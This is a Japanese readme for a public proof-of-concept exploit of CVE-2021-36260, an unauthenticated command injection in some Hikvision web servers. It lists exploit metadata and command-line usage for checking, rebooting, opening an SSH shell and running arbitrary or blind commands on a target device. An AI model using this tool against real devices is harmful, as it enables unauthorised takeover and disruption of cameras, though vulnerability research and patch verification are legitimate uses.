
CVE-2021-36260 POC は、一部のHikvision製品のWebサーバにおけるコマンドインジェクションの脆弱性です。入力検証が不十分なため、攻撃者は悪意のあるコマンドを含むメッセージを送信することで、コマンドインジェクション攻撃を仕掛けることができます。
エクスプロイトタイトル: Hikvision Web Server Build 210702 - コマンドインジェクション
エクスプロイト作者: bashis -- shubtheone によるエラー更新
ベンダーホームページ: https://www.hikvision.com/
バージョン: 1.0
CVE: CVE-2021-36260
参考: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
注:
[例] 安全な脆弱性/検証チェック: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
安全および安全でない脆弱性/検証チェック: ('安全なチェック'で検証されない場合にのみ '安全でないチェック' を使用します) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
安全でない脆弱性/検証チェック: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
SSHシェルを起動して接続: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
コマンドを実行: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
ブラインドコマンドを実行: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"